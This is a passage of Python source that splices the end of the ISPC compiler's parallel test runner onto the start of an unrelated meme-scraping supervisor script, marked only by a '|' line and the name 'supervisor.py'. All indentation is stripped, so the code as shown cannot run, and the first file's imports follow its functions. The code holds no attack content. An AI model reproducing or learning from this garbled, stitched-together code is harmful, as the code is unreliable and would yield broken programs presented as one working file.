sig2def = { "f_v(" : 0, "f_f(" : 1, "f_fu(" : 2, "f_fi(" : 3,
"f_du(" : 4, "f_duf(" : 5, "f_di(" : 6, "f_sz" : 7 }
file = open(filename, 'r')
match = -1
for line in file:
# look for lines with 'export'...
if line.find("export") == -1:
continue
# one of them should have a function with one of the
# declarations in sig2def
for pattern, ident in list(sig2def.items()):
if line.find(pattern) != -1:
match = ident
break
file.close()
if match == -1:
error("unable to find function signature in test %s\n" % testname, 0)
return (1, 0)
else:
global is_generic_target
global is_nvptx_target
global is_nvptx_nvvm
if is_windows:
if is_generic_target:
obj_name = "%s.cpp" % os.path.basename(filename)
else:
obj_name = "%s.obj" % os.path.basename(filename)
exe_name = "%s.exe" % os.path.basename(filename)
cc_cmd = "%s /I. /Zi /nologo /DTEST_SIG=%d %s %s /Fe%s" % \
(options.compiler_exe, match, add_prefix("test_static.cpp"), obj_name, exe_name)
if should_fail:
cc_cmd += " /DEXPECT_FAILURE"
else:
if is_generic_target:
obj_name = "%s.cpp" % testname
elif is_nvptx_target:
if os.environ.get("NVVM") == "1":
is_nvptx_nvvm = True
obj_name = "%s.ll" % testname
else:
obj_name = "%s.ptx" % testname
is_nvptx_nvvm = False
else:
obj_name = "%s.o" % testname
exe_name = "%s.run" % testname
if options.arch == 'arm':
gcc_arch = '--with-fpu=hardfp -marm -mfpu=neon -mfloat-abi=hard'
else:
if options.arch == 'x86':
gcc_arch = '-m32'
else:
gcc_arch = '-m64'
gcc_isa=""
if options.target == 'generic-4':
gcc_isa = '-msse4.2'
if (options.target == 'generic-8'):
if (options.include_file.find("knc-i1x8.h")!=-1 or options.include_file.find("knc-i1x8unsafe_fast.h")!=-1):
gcc_isa = '-mmic'
else:
gcc_isa = '-mavx'
if (options.target == 'generic-16' or options.target == 'generic-32' or options.target == 'generic-64') \
and (options.include_file.find("knc-i1x16.h")!=-1 or options.include_file.find("knc.h")!=-1 or options.include_file.find("knc2x.h")!=-1):
gcc_isa = '-mmic'
if (options.target == "knc-generic"):
cc_cmd = "%s -O2 -I. %s %s test_static.cpp -DTEST_SIG=%d %s -o %s" % \
(options.compiler_exe, gcc_arch, "-mmic", match, obj_name, exe_name)
elif (options.target == "knl-generic"):
cc_cmd = "%s -O2 -I. %s %s test_static.cpp -DTEST_SIG=%d %s -o %s" % \
(options.compiler_exe, gcc_arch, "-xMIC-AVX512", match, obj_name, exe_name)
else:
cc_cmd = "%s -O2 -I. %s %s test_static.cpp -DTEST_SIG=%d %s -o %s" % \
(options.compiler_exe, gcc_arch, gcc_isa, match, obj_name, exe_name)
if platform.system() == 'Darwin':
cc_cmd += ' -Wl,-no_pie'
if should_fail:
cc_cmd += " -DEXPECT_FAILURE"
if is_nvptx_target:
nvptxcc_exe = "ptxtools/runtest_ptxcc.sh"
nvptxcc_exe_rel = add_prefix(nvptxcc_exe)
cc_cmd = "%s %s -DTEST_SIG=%d -o %s" % \
(nvptxcc_exe_rel, obj_name, match, exe_name)
ispc_cmd = ispc_exe_rel + " --woff %s -o %s -O3 --arch=%s --target=%s" % \
(filename, obj_name, options.arch, options.target)
if (options.target == "knc-generic"):
ispc_cmd = ispc_exe_rel + " --woff %s -o %s --arch=%s --target=%s" % \
(filename, obj_name, options.arch, "generic-16")
elif (options.target == "knl-generic"):
ispc_cmd = ispc_exe_rel + " --woff %s -o %s --arch=%s --target=%s" % \
(filename, obj_name, options.arch, "generic-16")
else:
ispc_cmd = ispc_exe_rel + " --woff %s -o %s --arch=%s --target=%s" % \
(filename, obj_name, options.arch, options.target)
if options.no_opt:
ispc_cmd += " -O0"
if is_generic_target:
ispc_cmd += " --emit-c++ --c++-include-file=%s" % add_prefix(options.include_file)
if is_nvptx_target:
filename4ptx = "/tmp/"+os.path.basename(filename)+".parsed.ispc"
# grep_cmd = "grep -v 'export uniform int width' %s > %s " % \
grep_cmd = "sed 's/export\ uniform\ int\ width/static uniform\ int\ width/g' %s > %s" % \
(filename, filename4ptx)
if options.verbose:
print "Grepping: %s" % grep_cmd
sp = subprocess.Popen(grep_cmd, shell=True)
sp.communicate()
if is_nvptx_nvvm:
ispc_cmd = ispc_exe_rel + " --woff %s -o %s -O3 --emit-llvm --target=%s" % \
(filename4ptx, obj_name, options.target)
else:
ispc_cmd = ispc_exe_rel + " --woff %s -o %s -O3 --emit-asm --target=%s" % \
(filename4ptx, obj_name, options.target)
# compile the ispc code, make the executable, and run it...
ispc_cmd += " -h " + filename + ".h"
cc_cmd += " -DTEST_HEADER=<" + filename + ".h>"
(compile_error, run_error) = run_cmds([ispc_cmd, cc_cmd],
options.wrapexe + " " + exe_name, \
testname, should_fail)
# clean up after running the test
try:
os.unlink(filename + ".h")
if not options.save_bin:
if not run_error:
os.unlink(exe_name)
if is_windows:
basename = os.path.basename(filename)
os.unlink("%s.pdb" % basename)
os.unlink("%s.ilk" % basename)
os.unlink(obj_name)
except:
pass
return (compile_error, run_error)
# pull tests to run from the given queue and run them. Multiple copies of
# this function will be running in parallel across all of the CPU cores of
# the system.
def run_tasks_from_queue(queue, queue_ret, queue_error, queue_finish, total_tests_arg, max_test_length_arg, counter, mutex, glob_var):
# This is needed on Windows because multiprocessing does not copy globals from the parent process.
global is_windows
is_windows = glob_var[0]
global options
options = glob_var[1]
global s
s = glob_var[2]
global ispc_exe
ispc_exe = glob_var[3]
global is_generic_target
is_generic_target = glob_var[4]
global is_nvptx_target
is_nvptx_target = glob_var[5]
global run_tests_log
run_tests_log = glob_var[6]
if is_windows:
tmpdir = "tmp%d" % os.getpid()
while os.access(tmpdir, os.F_OK):
tmpdir = "%sx" % tmpdir
os.mkdir(tmpdir)
os.chdir(tmpdir)
else:
olddir = ""
# by default, the thread is presumed to fail
queue_error.put('ERROR')
compile_error_files = [ ]
run_succeed_files = [ ]
run_error_files = [ ]
skip_files = [ ]
while True:
if not queue.empty():
filename = queue.get()
if check_test(filename):
try:
(compile_error, run_error) = run_test(filename)
except:
# This is in case the child has unexpectedly died or some other exception happened.
# It's not what we wanted, so we leave ERROR in queue_error.
print_debug("ERROR: run_test function raised an exception: %s\n" % (sys.exc_info()[1]), s, run_tests_log)
# minus one thread, minus one STOP
queue_finish.get()
# needed for queue join
queue_finish.task_done()
# exiting the loop, returning from the thread
break
if compile_error == 0 and run_error == 0:
run_succeed_files += [ filename ]
if compile_error != 0:
compile_error_files += [ filename ]
if run_error != 0:
run_error_files += [ filename ]
with mutex:
update_progress(filename, total_tests_arg, counter, max_test_length_arg)
else:
skip_files += [ filename ]
else:
queue_ret.put((compile_error_files, run_error_files, skip_files, run_succeed_files))
if is_windows:
try:
os.remove("test_static.obj")
# The vc*.pdb trick is in anticipation of new versions of VS.
vcpdb = glob.glob("vc*.pdb")[0]
os.remove(vcpdb)
os.chdir("..")
# This will fail if there were failing tests or
# Windows is in a bad mood.
os.rmdir(tmpdir)
except:
pass
# the next line is crucial for error indication!
# this thread ended correctly, so take ERROR back
queue_error.get()
# minus one thread, minus one STOP
queue_finish.get()
# needed for queue join
queue_finish.task_done()
# exiting the loop, returning from the thread
break
def sigint(signum, frame):
for t in task_threads:
t.terminate()
sys.exit(1)
def file_check(compfails, runfails):
global exit_code
errors = len(compfails) + len(runfails)
new_compfails = []
new_runfails = []
new_passes_compfails = []
new_passes_runfails = []
# Open file fail_db.txt
f = open(test_states, 'r')
f_lines = f.readlines()
f.close()
# Detect OS
if platform.system() == 'Windows' or 'CYGWIN_NT' in platform.system():
OS = "Windows"
else:
if platform.system() == 'Darwin':
OS = "Mac"
else:
OS = "Linux"
# Detect opt_set
if options.no_opt == True:
opt = "-O0"
else:
opt = "-O2"
# Detect LLVM version
temp1 = common.take_lines(ispc_exe + " --version", "first")
llvm_version = temp1[-12:-4]
# Detect compiler version
if is_windows == False:
temp1 = common.take_lines(options.compiler_exe + " --version", "first")
temp2 = re.search("[0-9]*\.[0-9]*\.[0-9]", temp1)
if temp2 == None:
temp3 = re.search("[0-9]*\.[0-9]*", temp1)
else:
temp3 = re.search("[0-9]*\.[0-9]*", temp2.group())
compiler_version = options.compiler_exe + temp3.group()
else:
compiler_version = "cl"
possible_compilers=set()
for x in f_lines:
if x.startswith("."):
possible_compilers.add(x.split(' ')[-3])
if not compiler_version in possible_compilers:
error("\n**********\nWe don't have history of fails for compiler " +
compiler_version +
"\nAll fails will be new!!!\n**********", 2)
new_line = " "+options.arch.rjust(6)+" "+options.target.rjust(14)+" "+OS.rjust(7)+" "+llvm_version+" "+compiler_version.rjust(10)+" "+opt+" *\n"
new_compfails = compfails[:]
new_runfails = runfails[:]
new_f_lines = f_lines[:]
for j in range(0, len(f_lines)):
if (((" "+options.arch+" ") in f_lines[j]) and
((" "+options.target+" ") in f_lines[j]) and
((" "+OS+" ") in f_lines[j]) and
((" "+llvm_version+" ") in f_lines[j]) and
((" "+compiler_version+" ") in f_lines[j]) and
((" "+opt+" ") in f_lines[j])):
if (" compfail " in f_lines[j]):
f = 0
for i in range(0, len(compfails)):
if compfails[i] in f_lines[j]:
new_compfails.remove(compfails[i])
else:
f = f + 1
if f == len(compfails):
temp3 = f_lines[j].split(" ")
new_passes_compfails.append(temp3[0])
if options.update == "FP":
new_f_lines.remove(f_lines[j])
if (" runfail " in f_lines[j]):
f = 0
for i in range(0, len(runfails)):
if runfails[i] in f_lines[j]:
new_runfails.remove(runfails[i])
else:
f = f + 1
if f == len(runfails):
temp3 = f_lines[j].split(" ")
new_passes_runfails.append(temp3[0])
if options.update == "FP":
new_f_lines.remove(f_lines[j])
if len(new_runfails) != 0:
print_debug("NEW RUNFAILS:\n", s, run_tests_log)
exit_code = 1
for i in range (0,len(new_runfails)):
new_f_lines.append(new_runfails[i] + " runfail " + new_line)
print_debug("\t" + new_runfails[i] + "\n", s, run_tests_log)
if len(new_compfails) != 0:
print_debug("NEW COMPFAILS:\n", s, run_tests_log)
exit_code = 1
for i in range (0,len(new_compfails)):
new_f_lines.append(new_compfails[i] + " compfail " + new_line)
print_debug("\t" + new_compfails[i] + "\n", s, run_tests_log)
if len(new_runfails) == 0 and len(new_compfails) == 0:
print_debug("No new fails\n", s, run_tests_log)
if len(new_passes_runfails) != 0:
print_debug("NEW PASSES after RUNFAILS:\n", s, run_tests_log)
for i in range (0,len(new_passes_runfails)):
print_debug("\t" + new_passes_runfails[i] + "\n", s, run_tests_log)
if len(new_passes_compfails) != 0:
print_debug("NEW PASSES after COMPFAILS:\n", s, run_tests_log)
for i in range (0,len(new_passes_compfails)):
print_debug("\t" + new_passes_compfails[i] + "\n", s, run_tests_log)
if options.update != "":
output = open(test_states, 'w')
output.writelines(new_f_lines)
output.close()
return [new_runfails, new_compfails, new_passes_runfails, new_passes_compfails, new_line, errors]
def verify():
# Open file fail_db.txt
f = open(test_states, 'r')
f_lines = f.readlines()
f.close()
check = [["g++", "clang++", "cl"],["-O0", "-O2"],["x86","x86-64"],
["Linux","Windows","Mac"],["LLVM 3.2","LLVM 3.3","LLVM 3.4","LLVM 3.5","LLVM 3.6","LLVM trunk"],
["sse2-i32x4", "sse2-i32x8", "sse4-i32x4", "sse4-i32x8", "sse4-i16x8",
"sse4-i8x16", "avx1-i32x4" "avx1-i32x8", "avx1-i32x16", "avx1-i64x4", "avx1.1-i32x8",
"avx1.1-i32x16", "avx1.1-i64x4", "avx2-i32x8", "avx2-i32x16", "avx2-i64x4",
"generic-1", "generic-4", "generic-8",
"generic-16", "generic-32", "generic-64", "knc-generic", "knl-generic", "avx512knl-i32x16"]]
for i in range (0,len(f_lines)):
if f_lines[i][0] == "%":
continue
for j in range(0,len(check)):
temp = 0
for t in range(0,len(check[j])):
if " " + check[j][t] + " " in f_lines[i]:
temp = temp + 1
if temp != 1:
print_debug("error in line " + str(i) + "\n", False, run_tests_log)
break
def run_tests(options1, args, print_version):
global options
options = options1
global s
s = options.silent
# prepare run_tests_log and fail_db file
global run_tests_log
if options.in_file:
run_tests_log = os.getcwd() + os.sep + options.in_file
if print_version == 1:
common.remove_if_exists(run_tests_log)
else:
run_tests_log = ""
global test_states
test_states = "fail_db.txt"
if options.verify:
verify()
return 0
# disable fancy error/warning printing with ANSI colors, so grepping for error
# messages doesn't get confused
os.environ["TERM"] = "dumb"
# This script is affected by http://bugs.python.org/issue5261 on OSX 10.5 Leopard
# git history has a workaround for that issue.
global is_windows
is_windows = (platform.system() == 'Windows' or
'CYGWIN_NT' in platform.system())
if options.target == 'neon':
options.arch = 'arm'
if options.target == "nvptx":
options.arch = "nvptx64"
global ispc_exe
ispc_exe = ""
ispc_ext=""
if is_windows:
ispc_ext = ".exe"
if os.environ.get("ISPC_HOME") != None:
if os.path.exists(os.environ["ISPC_HOME"] + os.sep + "ispc" + ispc_ext):
ispc_exe = os.environ["ISPC_HOME"] + os.sep + "ispc" + ispc_ext
PATH_dir = string.split(os.getenv("PATH"), os.pathsep)
for counter in PATH_dir:
if ispc_exe == "":
if os.path.exists(counter + os.sep + "ispc" + ispc_ext):
ispc_exe = counter + os.sep + "ispc" + ispc_ext
# Check for the required ispc compiler; print an error message otherwise.
if ispc_exe == "":
error("ISPC compiler not found.\nAdded path to ispc compiler to your PATH variable or ISPC_HOME variable\n", 1)
print_debug("Testing ispc: " + ispc_exe + "\n", s, run_tests_log)
# On Windows, use a relative path so we don't depend on the host directory, which
# may contain whitespace and Unicode characters.
if is_windows:
common_prefix = os.path.commonprefix([ispc_exe, os.getcwd()])
ispc_exe = os.path.relpath(ispc_exe, os.getcwd())
ispc_exe += " " + options.ispc_flags
global is_generic_target
is_generic_target = ((options.target.find("generic-") != -1 and
options.target != "generic-1" and options.target != "generic-x1") or
options.target == "knc-generic" or options.target == "knl-generic")
global is_nvptx_target
is_nvptx_target = (options.target.find("nvptx") != -1)
if is_generic_target and options.include_file == None:
if options.target == "generic-4" or options.target == "generic-x4":
error("No generics #include specified; using examples/intrinsics/sse4.h\n", 2)
options.include_file = "examples/intrinsics/sse4.h"
options.target = "generic-4"
elif options.target == "generic-8" or options.target == "generic-x8":
error("No generics #include specified and no default available for \"generic-8\" target.\n", 1)
options.target = "generic-8"
elif options.target == "generic-16" or options.target == "generic-x16":
error("No generics #include specified; using examples/intrinsics/generic-16.h\n", 2)
options.include_file = "examples/intrinsics/generic-16.h"
options.target = "generic-16"
elif options.target == "generic-32" or options.target == "generic-x32":
error("No generics #include specified; using examples/intrinsics/generic-32.h\n", 2)
options.include_file = "examples/intrinsics/generic-32.h"
options.target = "generic-32"
elif options.target == "generic-64" or options.target == "generic-x64":
error("No generics #include specified; using examples/intrinsics/generic-64.h\n", 2)
options.include_file = "examples/intrinsics/generic-64.h"
options.target = "generic-64"
elif options.target == "knc-generic":
error("No knc #include specified; using examples/intrinsics/knc.h\n", 2)
options.include_file = "examples/intrinsics/knc.h"
elif options.target == "knl-generic":
error("No knl #include specified; using examples/intrinsics/knl.h\n", 2)
options.include_file = "examples/intrinsics/knl.h"
if options.compiler_exe == None:
if (options.target == "knc-generic"):
options.compiler_exe = "icpc"
elif (options.target == "knl-generic"):
options.compiler_exe = "icpc"
elif is_windows:
options.compiler_exe = "cl.exe"
else:
options.compiler_exe = "clang++"
# Check for the required compiler; print an error message otherwise.
PATH_dir = string.split(os.getenv("PATH"), os.pathsep)
compiler_exists = False
for counter in PATH_dir:
if os.path.exists(counter + os.sep + options.compiler_exe):
compiler_exists = True
break
if not compiler_exists:
error("missing the required compiler: %s \n" % options.compiler_exe, 1)
    # print compiler versions
if print_version > 0:
common.print_version(ispc_exe, "", options.compiler_exe, False, run_tests_log, is_windows)
ispc_root = "."
    # check that the required environment exists; otherwise print an error message
if (options.target == "knc-generic"):
options.wrapexe = "micnativeloadex"
PATH_dir = string.split(os.getenv("PATH"), os.pathsep)
wrapexe_exists = False
for counter in PATH_dir:
if os.path.exists(counter + os.sep + options.wrapexe):
wrapexe_exists = True
break
if not wrapexe_exists:
error("missing the required launcher: %s \nAdd it to your $PATH\n" % options.wrapexe, 1)
if platform.system() == 'Windows' or 'CYGWIN_NT' in platform.system():
OS = "Windows"
else:
if platform.system() == 'Darwin':
OS = "Mac"
else:
OS = "Linux"
if not (OS == 'Linux'):
error ("knc-generic target is supported only on Linux", 1)
# if no specific test files are specified, run all of the tests in tests/,
# failing_tests/, and tests_errors/
if len(args) == 0:
files = glob.glob(ispc_root + os.sep + "tests" + os.sep + "*ispc") + \
glob.glob(ispc_root + os.sep + "tests_errors" + os.sep + "*ispc")
else:
if is_windows:
argfiles = [ ]
for f in args:
                # we have to glob ourselves if this is being run under a DOS
                # shell, as it passes wildcards through as-is.
argfiles += glob.glob(f)
else:
argfiles = args
files = [ ]
for f in argfiles:
if os.path.splitext(string.lower(f))[1] != ".ispc":
error("Ignoring file %s, which doesn't have an .ispc extension.\n" % f, 2)
else:
files += [ f ]
    # max_test_length is used to issue the exact number of whitespace characters when
    # updating the status. Otherwise the update causes new lines on a standard 80-char
    # terminal on both Linux and Windows.
max_test_length = 0
for f in files:
max_test_length = max(max_test_length, len(f))
# randomly shuffle the tests if asked to do so
if (options.random):
random.seed()
random.shuffle(files)
# counter
total_tests = len(files)
compile_error_files = [ ]
run_succeed_files = [ ]
run_error_files = [ ]
skip_files = [ ]
nthreads = min(multiprocessing.cpu_count(), options.num_jobs)
nthreads = min(nthreads, len(files))
print_debug("Running %d jobs in parallel. Running %d tests.\n" % (nthreads, total_tests), s, run_tests_log)
# put each of the test filenames into a queue
q = multiprocessing.Queue()
for fn in files:
q.put(fn)
# qret is a queue for returned data
qret = multiprocessing.Queue()
# qerr is an error indication queue
qerr = multiprocessing.Queue()
# qfin is a waiting queue: JoinableQueue has join() and task_done() methods
qfin = multiprocessing.JoinableQueue()
# for each thread, there is a STOP in qfin to synchronize execution
for x in range(nthreads):
qfin.put('STOP')
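    # A minimal sketch of the queue/sentinel pattern used here, with hypothetical
    # names, for illustration only (comments, not executed):
    #
    #   work_q = multiprocessing.Queue()          # filenames to process
    #   stop_q = multiprocessing.JoinableQueue()  # one 'STOP' sentinel per worker
    #   for _ in range(nworkers):
    #       stop_q.put('STOP')
    #   # each worker drains work_q, then consumes one sentinel and calls
    #   # stop_q.task_done(); the parent blocks on stop_q.join() until every
    #   # worker has finished.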
# need to catch sigint so that we can terminate all of the tasks if
# we're interrupted
signal.signal(signal.SIGINT, sigint)
finished_tests_counter = multiprocessing.Value(c_int)
finished_tests_counter_lock = multiprocessing.Lock()
start_time = time.time()
# launch jobs to run tests
glob_var = [is_windows, options, s, ispc_exe, is_generic_target, is_nvptx_target, run_tests_log]
global task_threads
task_threads = [0] * nthreads
for x in range(nthreads):
task_threads[x] = multiprocessing.Process(target=run_tasks_from_queue, args=(q, qret, qerr, qfin, total_tests,
max_test_length, finished_tests_counter, finished_tests_counter_lock, glob_var))
task_threads[x].start()
# wait for them all to finish and rid the queue of STOPs
# join() here just waits for synchronization
qfin.join()
if options.non_interactive == False:
print_debug("\n", s, run_tests_log)
temp_time = (time.time() - start_time)
elapsed_time = time.strftime('%Hh%Mm%Ssec.', time.gmtime(temp_time))
while not qret.empty():
(c, r, skip, ss) = qret.get()
compile_error_files += c
run_error_files += r
skip_files += skip
run_succeed_files += ss
# Detect opt_set
if options.no_opt == True:
opt = "-O0"
else:
opt = "-O2"
try:
common.ex_state.add_to_rinf_testall(total_tests)
for fname in skip_files:
            # We do not add skipped tests to the test table as we do not know the test result
common.ex_state.add_to_rinf(options.arch, opt, options.target, 0, 0, 0, 1)
for fname in compile_error_files:
common.ex_state.add_to_tt(fname, options.arch, opt, options.target, 0, 1)
common.ex_state.add_to_rinf(options.arch, opt, options.target, 0, 0, 1, 0)
for fname in run_error_files:
common.ex_state.add_to_tt(fname, options.arch, opt, options.target, 1, 0)
common.ex_state.add_to_rinf(options.arch, opt, options.target, 0, 1, 0, 0)
for fname in run_succeed_files:
common.ex_state.add_to_tt(fname, options.arch, opt, options.target, 0, 0)
common.ex_state.add_to_rinf(options.arch, opt, options.target, 1, 0, 0, 0)
except:
print_debug("Exception in ex_state. Skipping...", s, run_tests_log)
# if all threads ended correctly, qerr is empty
if not qerr.empty():
raise OSError(2, 'Some test subprocess has thrown an exception', '')
if options.non_interactive:
print_debug(" Done %d / %d\n" % (finished_tests_counter.value, total_tests), s, run_tests_log)
if len(skip_files) > 0:
skip_files.sort()
print_debug("%d / %d tests SKIPPED:\n" % (len(skip_files), total_tests), s, run_tests_log)
for f in skip_files:
print_debug("\t%s\n" % f, s, run_tests_log)
if len(compile_error_files) > 0:
compile_error_files.sort()
print_debug("%d / %d tests FAILED compilation:\n" % (len(compile_error_files), total_tests), s, run_tests_log)
for f in compile_error_files:
print_debug("\t%s\n" % f, s, run_tests_log)
if len(run_error_files) > 0:
run_error_files.sort()
print_debug("%d / %d tests FAILED execution:\n" % (len(run_error_files), total_tests), s, run_tests_log)
for f in run_error_files:
print_debug("\t%s\n" % f, s, run_tests_log)
if len(compile_error_files) == 0 and len(run_error_files) == 0:
print_debug("No fails\n", s, run_tests_log)
if len(args) == 0:
R = file_check(compile_error_files, run_error_files)
else:
error("don't check new fails for incomplete suite of tests", 2)
R = 0
if options.time:
print_debug("Elapsed time: " + elapsed_time + "\n", s, run_tests_log)
return [R, elapsed_time]
from optparse import OptionParser
import multiprocessing
from ctypes import c_int
import os
import sys
import glob
import re
import signal
import random
import string
import threading
import subprocess
import shlex
import platform
import tempfile
import os.path
import time
# our functions
import common
print_debug = common.print_debug
error = common.error
exit_code = 0
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-r", "--random-shuffle", dest="random", help="Randomly order tests",
default=False, action="store_true")
parser.add_option("-g", "--generics-include", dest="include_file", help="Filename for header implementing functions for generics",
default=None)
parser.add_option("-f", "--ispc-flags", dest="ispc_flags", help="Additional flags for ispc (-g, -O1, ...)",
default="")
parser.add_option('-t', '--target', dest='target',
help=('Set compilation target (sse2-i32x4, sse2-i32x8, sse4-i32x4, sse4-i32x8, ' +
'sse4-i16x8, sse4-i8x16, avx1-i32x8, avx1-i32x16, avx1.1-i32x8, avx1.1-i32x16, ' +
'avx2-i32x8, avx2-i32x16, avx512knl-i32x16, generic-x1, generic-x4, generic-x8, generic-x16, ' +
'generic-x32, generic-x64, knc-generic, knl-generic)'), default="sse4")
parser.add_option('-a', '--arch', dest='arch',
help='Set architecture (arm, x86, x86-64)',default="x86-64")
parser.add_option("-c", "--compiler", dest="compiler_exe", help="C/C++ compiler binary to use to run tests",
default=None)
parser.add_option('-o', '--no-opt', dest='no_opt', help='Disable optimization',
default=False, action="store_true")
parser.add_option('-j', '--jobs', dest='num_jobs', help='Maximum number of jobs to run in parallel',
default="1024", type="int")
parser.add_option('-v', '--verbose', dest='verbose', help='Enable verbose output',
default=False, action="store_true")
parser.add_option('--wrap-exe', dest='wrapexe',
help='Executable to wrap test runs with (e.g. "valgrind" or "sde -knl -- ")',
default="")
parser.add_option('--time', dest='time', help='Enable time output',
default=False, action="store_true")
parser.add_option('--non-interactive', dest='non_interactive', help='Disable interactive status updates',
default=False, action="store_true")
parser.add_option('-u', "--update-errors", dest='update', help='Update file with fails (F of FP)', default="")
parser.add_option('-s', "--silent", dest='silent', help='enable silent mode without any output', default=False,
action = "store_true")
parser.add_option("--file", dest='in_file', help='file to save run_tests output', default="")
parser.add_option("--verify", dest='verify', help='verify the file fail_db.txt', default=False, action="store_true")
parser.add_option("--save-bin", dest='save_bin', help='compile and create bin, but don\'t execute it',
default=False, action="store_true")
(options, args) = parser.parse_args()
L = run_tests(options, args, 1)
exit(exit_code)
|
supervisor.py
|
import os
import signal
import threading
from Queue import Queue
from urlparse import urlparse
import requests
from google.cloud import vision
from pymongo import MongoClient
from crawlers.buzzfeed import BuzzFeedCrawler
from crawlers.cheez_burger import CheezBurgerCrawler
from crawlers.dopl3r import Dopl3rCrawler
from crawlers.dump_a_day import DumpADayCrawler
from crawlers.funny_memes import FunnyMemesCrawler
from crawlers.funnyjunk import FunnyJunkCrawler
from crawlers.ifunny import IfunnyCrawler
from crawlers.imgflip import ImgFlipCrawler
from crawlers.imgur import ImgurCrawler
from crawlers.instagram import InstagramCrawler
from crawlers.ladnow import LadnowCrawler
from crawlers.le_funny import LeFunnyCrawler
from crawlers.me_me import MeMeCrawler
from crawlers.meme_generator import MemeGeneratorCrawler
from crawlers.meme_guy import MemeGuyCrawler
from crawlers.meme_xyz import MemeXYZCrawler
from crawlers.memedroid import MemedroidCrawler
from crawlers.nine_gag import NineGagCrawler
from crawlers.on_sizzle import OnSizzleCrawler
from crawlers.pinterest_crawler import PinterestCrawler
from crawlers.quora_treasury import QuoraTreasuryCrawler
from crawlers.reddit import RedditCrawler, r_get_submission_comments
from crawlers.ruin_my_week import RuinMyWeekCrawler
from crawlers.the_chive import TheChiveCrawler
from crawlers.the_funny_beaver import TheFunnyBeaverCrawler
from crawlers.the_humor_train import TheHumorTrainCrawler
from crawlers.troll_street import TrollStreetCrawler
from crawlers.tumblr import TumblrCrawler
from crawlers.vifunow import VifunowCrawler
from crawlers.dank_meme_team import DankMemeTeamCrawler
from crawlers.funny_photo import FunnyPhotoCrawler
from crawlers.img_lulz import ImgLulzCrawler
from crawlers.huge_lol import HugeLolCrawler
from crawlers.daily_pic_dump import DailyPicDumpCrawler
from crawlers.call_center_memes import CallCenterMemesCrawler
from crawlers.pr0gramm import Pr0grammCrawler
from crawlers.trend_uso import TrendUSOMemesCrawler
from crawlers.best_funny_pic import BestFunnyPicCrawler
from crawlers.joy_reactor import JoyReactorCrawler
from crawlers.beer_money_pizza import BeerMoneyPizzaCrawler
from crawlers.hidden_lol import HiddenLolCrawler
from crawlers.fun_substance import FreshSubstanceCrawler
from crawlers.nine_buzz import NineBuzzCrawler
from crawlers.the_meta_picture import TheMetaPictureCrawler
from crawlers.daily_haha import DailyHahaCrawler
from crawlers.dev_humor import DevHumorCrawler
from crawlers.iwsmt import IWSMTCrawler
from crawlers.four_pm_happy_hour import FourPMHappyHourCrawler
from crawlers.kontraband import KontrabandCrawler
from crawlers.still_cracking import StillCrackingCrawler
from crawlers.meme_collection import MemeCollectionCrawler
from crawlers.slow_robot import SlowRobotCrawler
from crawlers.wanna_joke import WannaJokeCrawler
from crawlers.some_ecards import SomeEcardsCrawler
from crawlers.laugh_tard import LaughTardCrawler
from crawlers.humour_spot import HumourSpotCrawler
from crawlers.put_me_like import PutMeLikeCrawler
from crawlers.spastic_bastard import SpasticBastardCrawler
from crawlers.saying_images import SayingImagesCrawler
from crawlers.fun_pic import FunPicCrawler
from crawlers.barnorama import BarnoramaCrawler
from crawlers.fun_mary import FunMaryCrawler
from crawlers.gorilla_feed import GorillaFeedCrawler
from crawlers.one_jux import OneJuxCrawler
from crawlers.odd_stuff_magazine import OddStuffMagazineCrawler
from crawlers.love_for_quotes import LoveForQuotesCrawler
from crawlers.bored_panda import BoredPandaCrawler
from crawlers.ebaums_world import EbaumsWorldCrawler
from crawlers.thunder_dungeon import ThunderDungeonCrawler
from crawlers.zodab import ZodabCrawler
from crawlers.funny_captions import FunnyCaptionsCrawler
from crawlers.fame_pace import FamePaceCrawler
from crawlers.funny_memes_4u import FunnyMemes4UCrawler
from crawlers.epic_pix import EpicPixCrawler
from crawlers.lol_damn import LolDamnCrawler
from crawlers.uber_humor import UberHumorCrawler
from crawlers.just_viral import JustViralCrawler
from crawlers.acid_cow import AcidCowCrawler
from crawlers.facebook_crawler import FacebookCrawler
from crawlers.four_chan import FourChanCrawler
from crawlers.clean_memes import CleanMemesCrawler
from crawlers.the_last_thing_99 import TheLastThingCrawler
from crawlers.astrology_memes import AstrologyMemesCrawler
from crawlers.thuglife_meme import ThugLifeMemeCrawler
from crawlers.izismile import IzismileCrawler
from crawlers.quotes_n_humor import QuotesNHumorCrawler
from crawlers.screen_eggs import ScreenEggsCrawler
from crawlers.twitter_crawler import TwitterCrawler
# from crawlers.evil_milk import EvilMilkCrawler
from settings import EXCLUDED_TLDS, CRAWL_DAYS_BACK, DATA_ROOT_PATH, BEGIN_CRAWL_SINCE, \
MONGODB_NAME
from utils import sha256_checksum, annotate_text, annotate_web
google_client = vision.ImageAnnotatorClient()
mongo_client = MongoClient()
db = mongo_client[MONGODB_NAME]
posts = db.posts
instagram = db.instagram
instagram_nodes = db.instagram_nodes
nine_gag = db.nine_gag
reddit = db.reddit
imgur = db.imgur
imgflip = db.imgflip
funny_junk = db.funny_junk
on_sizzle = db.on_sizzle
routes = db.routes
images = db.images
sources = db.sources
facebook_pages = db.facebook
twitter_accounts = db.twitter
google_queue = Queue()
CRAWLER_THREADS = {}
def get_http_headers(url):
response = requests.get(url)
if response.status_code == 404:
return None
return response.headers
ig_accounts = sorted([r.lower() for r in sources.find_one({"name": "instagram"})['children']])
four_chan_boards = ['b', 'pol']
sub_reddit_accounts = [r.lower() for r in sources.find_one({"name": "reddit"})['children']]
facebook_pages_list = [p for p in facebook_pages.find({"posts": {"$exists": True}, "deleted": {"$exists": False},
"latest_post_time": {"$gte": "2019-01-01T08:00:20+0000"}}).sort(
"last_crawled", 1)]
twitter_accounts_list = [p for p in twitter_accounts.find({"deleted": {"$exists": False}}).sort("last_crawled", 1)]
for i in ig_accounts:
if not os.path.exists("{}/data/instagram/{}".format(DATA_ROOT_PATH, i)):
os.mkdir("{}/data/instagram/{}".format(DATA_ROOT_PATH, i))
for p in facebook_pages_list:
if not os.path.exists("{}/data/facebook/{}".format(DATA_ROOT_PATH, p['id'])):
os.mkdir("{}/data/facebook/{}".format(DATA_ROOT_PATH, p['id']))
for p in twitter_accounts_list:
if not os.path.exists("{}/data/twitter/{}".format(DATA_ROOT_PATH, p['screen_name'])):
os.mkdir("{}/data/twitter/{}".format(DATA_ROOT_PATH, p['screen_name']))
for b in four_chan_boards:
if not os.path.exists("{}/data/four_chan/{}".format(DATA_ROOT_PATH, b)):
